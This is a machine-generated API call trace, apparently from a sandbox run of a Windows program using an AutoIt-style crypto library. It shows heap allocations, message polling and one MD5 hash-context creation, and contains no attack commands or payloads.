[0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.667] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0255.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0255.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.667] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0255.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0255.668] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.668] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0255.668] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.668] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.668] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0255.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0255.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0255.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.669] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0255.669] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0255.669] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0255.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0255.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0255.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0255.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e518b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0255.670] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0255.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0255.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0255.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0255.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0255.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0255.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0255.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0255.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0255.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0255.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0255.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0255.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0255.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0255.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0255.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0255.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0255.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0255.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0255.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0255.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0255.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0255.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.677] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0255.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0255.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0255.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0255.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0255.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0255.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0255.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0255.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.678] 